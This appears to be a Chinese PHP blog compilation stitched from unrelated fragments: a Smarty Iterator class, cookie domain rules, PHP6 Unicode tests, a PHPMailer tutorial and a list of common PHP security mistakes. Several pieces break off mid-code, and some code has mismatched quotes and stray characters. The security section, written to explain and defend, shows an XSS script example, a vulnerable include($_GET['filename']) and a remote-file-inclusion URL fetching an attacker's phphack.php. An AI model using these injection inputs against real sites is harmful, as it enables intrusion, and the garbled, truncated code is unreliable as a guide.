php5中Iterator与smarty整合

php5中Iterator与smarty整合

Iterator(迭代器)在PHP5中是非常重要的，我注意到Iterator在Smarty中不能正常的工作。
Smarty会自动将一个object(对象)转换成array(数组)，所以当年在Smarty中循环输出一个object时，模板会自动循环这个object的属性。
例如，建立一个类，然后在函数中定义某些要循环的部分，将这些部分放到protected类型的$_data变量中。
<?php
    class MyClass implements Iterator
    {
        protected $_data = array();
 
        public function rewind()
        {
            reset($this->_data);
        }
 
        public function current()
        {
            return current($this->_data);
        }
 
        public function key()
        {
            return key($this->_data);
        }
 
        public function next()
        {
            return next($this->_data);
        }
 
        public function valid()
        {
            return $this->current() !== false;
        }
 
        public function size()
        {
            return count($this->_data);
        }

以前真没在意cookie的作用域问题，可能以前用.com域名没出过问题,今天用公司的一个cn域名测试，怎么也不能实现cookie共享，后来采用js设置cookie，在另外一台服务器上共享cookie成功，真叫气人！翻阅了一下php的cookie 规范 ，里面有这么一段

Only hosts within the specified domain can set a cookie for a domain and domains must have at least two (2) or three (3) periods in them to prevent domains of the form: ".com", ".edu", and "va.us". Any domain that fails within one of the seven special top level domains listed below only require two periods. Any other domain requires at least three. The seven special top level domains are: "COM", "EDU", "NET", "ORG", "GOV", "MIL", and "INT".

看出来了吧，真他娘的草蛋！除了"COM", "EDU", "NET", "ORG", "GOV", "MIL", and "INT"这几个后缀的域名可以设置二级作用域，其他的域名至少三级才可以，也就是说想通过设置作用域为b.cn来实现a.b.cn和c.b.cn下的 cookie共享用php是不行的，php只能实现作用域b.a.cn下的d.b.a.cn和e.b.a.cn间的cookie共享，希望大家注意，再遇到此类问题，别浪费时间拼命的测试了……

我刚刚安装了PHP6 DEV版本，决定测试一下PHP6的新特性-PHP的Unicode支持。我并没有打算讲PHP6的新特性或者是Unicode，下面仅仅是我做的关于Unicode的测试。

首先要做的是让php6支持Unicode，在php.ini文件中修改。

;;;;;;;;;;;;;;;;;;;;
; Unicode settings ;
;;;;;;;;;;;;;;;;;;;;unicode.semantics = on
unicode.runtime_encoding = utf-8
unicode.script_encoding = utf-8
unicode.output_encoding = utf-8
unicode.from_error_mode = U_INVALID_SUBSTITUTE
unicode.from_error_subst_char = 3f
由于我使用的是法语和英语有所不同，有一些字符需要处理。
所以，我第一次试验的目的是检验strlen功能的Unicode …

$word = "être";
echo "Length: ".strlen($word);

结果是： Length: 4  。结果非常的正确… …但它仅仅是个开始！ ： ）

我的第二个测试对象是与PHP6新的SPL中的TextIterator textiterator
$word = "être";
foreach (new TextIterator($word, TextIterator::CHARACTER) as $character) {
? var_inspect($character);
}

输出: unicode(1) “ê” { 00ea } unicode(1) “t” { 0074 } unicode(1) “r” { 0072 } unicode(1) “e” { 0065 }
分解单词，得到了很多的字母和字母的信息…

TextIterator::CHARACTER的操作看上去非常的强大啊，不过TextIterator::WORD更强大

$sentences = "Bonjour, nous sommes Français ! Aïe :)";
foreach (new TextIterator($sentences, TextIterator::WORD) as $word) {
    var_inspect($word);
}

得到的结果： unicode(7) “Bonjour” { 0042 006f 006e 006a 006f 0075 0072 } unicode(1) “,” { 002c } unicode(1) ” ” { 0020 } unicode(4) “nous” { 006e 006f 0075 0073 } unicode(1) ” ” { 0020 } unicode(6) “sommes” { 0073 006f 006d 006d 0065 0073 } unicode(1) ” ” { 0020 } unicode(8) “Français” { 0046 0072 0061 006e 00e7 0061 0069 0073 } unicode(1) ” ” { 0020 }

  

发送邮件是一个经常使用的功能，但是php的默认支持并不是很好，这里介绍一个很好的开源模块：phpmailer，此模块功能比较全面，支持SMTP验证。下面就简单介绍一下它的使用方法：

1 下载phpmailer模块： 官方网站 http://www.phpdoc.org/

2 解压到一个文件夹

3 在php文件中包含 require_once("class.phpmailer.php"); 

4 使用SMTP发送邮件：

$mail = new PHPMailer();     //得到一个PHPMailer实例

$mail->CharSet = "gb2312";  //设置采用gb2312中文编码
$mail->IsSMTP();                    //设置采用SMTP方式发送邮件
$mail->Host = "192.168.1.27";    //设置邮件服务器的地址
$mail->Port = 25;                           //设置邮件服务器的端口，默认为25

$mail->From     = "mailFrom@tencent.com";  //设置发件人的邮箱地址
$mail->FromName = "samzhang";                       //设置发件人的姓名
//$mail->SMTPAuth = true;                                    //设置SMTP是否需要密码验证，true表示需要

$mail->Username="samzhang";

$mail->Password = ''your password";
$mail->Subject = $subject;                                 //设置邮件的标题

$mail->AltBody = "text/html";                                // optional, comment out and test

$mail->Body = "你的邮件的内容";                   

$mail->IsHTML(
1.不转意html entities

  一个基本的常识：所有不可信任的输入（特别是用户从form中提交的数据） ，输出之前都要转意。

echo $_GET[''usename''] ;


这个例子有可能输出：

<scrīpt>/*更改admin密码的脚本或设置cookie的脚本*/</scrīpt>

这是一个明显的安全隐患，除非你保证你的用户都正确的输入。

如何修复 ：

我们需要将"< ",">","and" 等转换成正确的HTML表示(< , >'', and ")，函数htmlspecialchars 和 htmlentities()正是干这个活的。

正确的方法：

echo htmlspecialchars($_GET[''username''], ENT_QUOTES);




2. 不转意SQL输入
我曾经在一篇文章中最简单的防止sql注入的方法(php+mysql中)讨论过这个问题并给出了一个简单的方法 。有人对我说，他们已经在php.ini中将magic_quotes设置为On，所以不必担心这个问题，但是不是所有的输入都是从$_GET, $_POST或 $_COOKIE中的得到的！
如何修复：

和在最简单的防止sql注入的方法(php+mysql中)中一样我还是推荐使用mysql_real_escape_string()函数


正确做法：
<?php
$sql = "UPDATE users SET
name=''.mysql_real_escape_string($name).''
WHERE id=''.mysql_real_escape_string ($id).''";
mysql_query($sql);
?>






3.错误的使用HTTP-header 相关的函数: header(), session_start(), setcookie()
遇到过这个警告吗?"warning: Cannot add header information - headers already sent [....]

每次从服务器下载一个网页的时候，服务器的输出都分成两个部分：头部和正文。
头部包含了一些非可视的数据，例如cookie。头部总是先到达。正文部分包括可视的html，图片等数据。
如果output_buffering设置为Off，所有的HTTP-header相关的函数必须在有输出之前调用。问题在于你在一个环境中开发，而在部署到另一个环境中去的时候，output_buffering的设置可能不一样。结果转向停止了，cookie和session都没有正确的设置........。

如何修复:
确保在输出之前调用http-header相关的函数，并且令output_buffering = Off
。



4. Require 或 include 的文件使用不安全的数据
再次强调：不要相信不是你自己显式声明的数据。不要 Include 或 require 从$_GET, $_POST 或 $_COOKIE 中得到的文件。


例如:
index.php
<?
//including header, config, database connection, etc
include($_GET[''filename'']);
//including footer
?>


现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt
来获取你的机密信息，或执行一个PHP脚本。


如果allow_url_fopen=On，你更是死定了：
试试这个输入：
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

现在你的网页中包含了http://www.youaredoomed.com/phphack.php的输出. 黑客可以发送垃圾邮件，改变密码，删除文件等等。只要你能想得到。